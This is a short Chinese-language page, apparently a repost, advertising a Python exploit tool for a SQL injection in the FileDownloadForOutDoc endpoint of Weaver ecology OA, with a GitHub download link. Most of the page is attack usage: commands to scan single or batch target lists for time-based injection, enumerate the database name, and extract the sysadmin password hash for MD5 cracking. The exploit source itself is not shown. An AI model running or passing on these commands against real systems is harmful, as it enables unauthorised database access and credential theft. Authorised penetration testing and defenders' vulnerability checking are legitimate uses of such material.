| 关联规则 | 关联知识 | 关联工具 | 关联文档 | 关联抓包 |
| 参考1(官网) | |
| 参考2 | |
| 参考3 |
工具下载链接:https://github.com/FeiNiao/ecology_oa_FileDownloadForOutDoc_sql/blob/main/ecology_oa_FileDownloadForOutDoc_sql.py
1、工具介绍
泛微OA FileDownloadForOutDoc reception SQL inject 检测利用脚本,EXP,渗透测试,POC
2、工具使用
python .\ecology_oa_FileDownloadForOutDoc_sql.py -h
效果图
[出自:jiwo.org]
参数介绍
单url检测
python .\ecology_oa_FileDownloadForOutDoc_sql.py -u http://123.abc.com
多url检测(txt文本形式),最后疑似存在延时注入的url都会存储到当前目录下的res.txt中
python .\ecology_oa_FileDownloadForOutDoc_sql.py -f host.txt
遍历目标当前数据库名
python .\ecology_oa_FileDownloadForOutDoc_sql.py -u http://123.abc.co -db
效果图
遍历sysadmin用户的数据密文,此密文需要进行md5解密
python .\ecology_oa_FileDownloadForOutDoc_sql.py -u http://123.abc.com -e
效果图
3、工具下载
链接:https://github.com/FeiNiao/ecology_oa_FileDownloadForOutDoc_sql/blob/main/ecology_oa_FileDownloadForOutDoc_sql.py
